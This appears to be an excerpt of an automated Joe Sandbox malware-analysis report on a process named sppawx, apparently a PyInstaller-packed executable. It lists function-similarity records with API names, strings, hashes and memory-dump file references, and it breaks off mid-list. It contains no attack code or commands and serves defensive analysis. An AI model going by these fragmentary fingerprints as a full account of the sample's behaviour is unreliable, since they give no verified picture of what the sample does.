                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction ID: fddc892f905377e5c9ac2dbfed2311a6bed1831833bf9a42d32a1ffeb0a4a2a2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB218E72A1AB8182F670EB61B8817E6B3A4FB88384F80017DFE8C47659DF7CD6458750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getservbynamehtons
                                                                                                                                                                                                                              • String ID: service/proto not found$socket.getservbyname$s|s:getservbyname
                                                                                                                                                                                                                              • API String ID: 3889749166-1257235949
                                                                                                                                                                                                                              • Opcode ID: 68eba5670ff14576cece73f52d08d650a9a7bf835ee56f3a8bf647e0bb2929f3
                                                                                                                                                                                                                              • Instruction ID: 3fdda837f0f18e044af313f87bd5d269dcf057bdb4011c222fcae50b3093c7ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68eba5670ff14576cece73f52d08d650a9a7bf835ee56f3a8bf647e0bb2929f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111EA61A08B42A2EB309B15E84427D6371FBC9BA5F580037DA4D47E74EF7DD449C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction ID: 2e20c439f850b9cc883e699072db82c390d648411c02f8f99ca6c56cfe179dbd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF04F21E0A60682FA60AB34A899379B360AF45761FD406BDDA6E461E4DF2CD444C320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cert$Store$00007CloseContextEnumErrorFreeLastOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 966150261-0
                                                                                                                                                                                                                              • Opcode ID: f021d72c0826bf4e5c6ac57c28d8ec2aa657f9230c691dd09dec7c463f0f1817
                                                                                                                                                                                                                              • Instruction ID: ac6f952bf63a3bc840efae081629357c4a12a68ff50e63fe82f8c681fc99573b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f021d72c0826bf4e5c6ac57c28d8ec2aa657f9230c691dd09dec7c463f0f1817
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1611B36E0D64286EA39AF21995417C63A5EFC9FA4B1D443AC94E16FB4FE3DE442C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeTable$ConvertInterfaceLuidNameTable2
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1671601251-0
                                                                                                                                                                                                                              • Opcode ID: 1c8d5fcfbe51bea9f06fff83d3df8c52d3ecb8378788f061d169f7a658b6a151
                                                                                                                                                                                                                              • Instruction ID: 5b14b14ec9b5551136bc7ed8f28d4ce4dd43b7ee37b5161edcd0dec922db9936
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c8d5fcfbe51bea9f06fff83d3df8c52d3ecb8378788f061d169f7a658b6a151
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25410835A18B82A2EB749B21A95437D73A0FFC5B65F080036D94E47AB4FF6CE4458B41
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: a43e02ceae4b777d456a7e579573dbd10ea9977e3b6ba35cc75c43da69c8ccd4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2118262E5DA13A1FA74B134D477376B0446F59364EC40ABCEAAE062D6CE2C69414264
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B41F
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B43E
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B466
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B477
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B488
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: ccac5f17aa91da4f3bae42de7e7333904383ed8f97faa160faf07aaa8124ee46
                                                                                                                                                                                                                              • Instruction ID: 1d2b2f241a8a0fadcbeede62a05a77b5e099780154514e6828fdbbb9954bb4c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccac5f17aa91da4f3bae42de7e7333904383ed8f97faa160faf07aaa8124ee46
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44113020F0F64281FA78B73599961B9F2815F447B0FD887BCDD3D466D6DE2CB8418220
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 189bd32c29972b75cbfb961d88c763c1323b9a0b7d58335ae669547dde4e0126
                                                                                                                                                                                                                              • Instruction ID: de96ef790fffefeebc44034530ff6d9624b7c9bfa265193ce7353a4a1a40ef70
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 189bd32c29972b75cbfb961d88c763c1323b9a0b7d58335ae669547dde4e0126
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58111820E1B20742F978BA7158156BAF2818F45324FD887BCED3E4A2D2DD2CB8014231
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: 8d0d28bd5b0e1e05dda1f02d465027fe5ca449077f58f0131e85165420268c35
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9291AB22A0AB4681F771AE35E45037DB6A1EF40B94F84817EDE4A423C6DF3CF8058361
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction ID: 233d0ad5b0d599eb083509346c113782ae44eb483ce3b5d5adadfb5687adf87f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9981D032E0E24386F7757F39C110278B7A0AB11B48FD580BDDE099729ADB2DE921D761
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                              • Instruction ID: a2f8247e661a3252d4eba9d4ae56190789f1f1c995bc78842721e4931de32f4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E519032B1A6028AFB24EF25E444A78B791EB45BD8F90817CDA4E47788DF7CE841C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction ID: 2e01b78d3edcd89a96c3a41701cc8073a2d866be18c88203a4e20881a21ce714
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B351AE32A0928286FB74EE319544278B7A0EB54B88F94827EEA8D47795CF3CF451C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction ID: 9dbb84cbd7fe5899863eaf9d411033c2d980f4a947e9828f094150f78da7c031
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B617032909B8586E770EB25E4413AAF7A0FB85784F44427AEB9D07B95DF7CE190CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF79A31352C,?,00000000,00007FF79A313F23), ref: 00007FF79A317F22
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                              • Instruction ID: f0f94f65abb296293535af719a6d8c2703c709ee808a3900b946d0e521de170b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8831A52171EAC145FA31EB31A8507EAB354EB84BE4F84027DEA6D477C9DF2CD6458B10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ComputerErrorLastName
                                                                                                                                                                                                                              • String ID: socket.gethostname
                                                                                                                                                                                                                              • API String ID: 3560734967-2650736202
                                                                                                                                                                                                                              • Opcode ID: 3405576d76487752179143ca9e9ce24f0a64481455d61518cebafc033de9272a
                                                                                                                                                                                                                              • Instruction ID: f1277cf02a282c63abe6fc49cf5625f50da5a7dfc95fe3498f5bc26cfea3f8c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3405576d76487752179143ca9e9ce24f0a64481455d61518cebafc033de9272a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77310C35B0CB82A2E7349B21A81527E63B5FFC9BA5F5C0136D94E46AB4FE3CE504C600
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
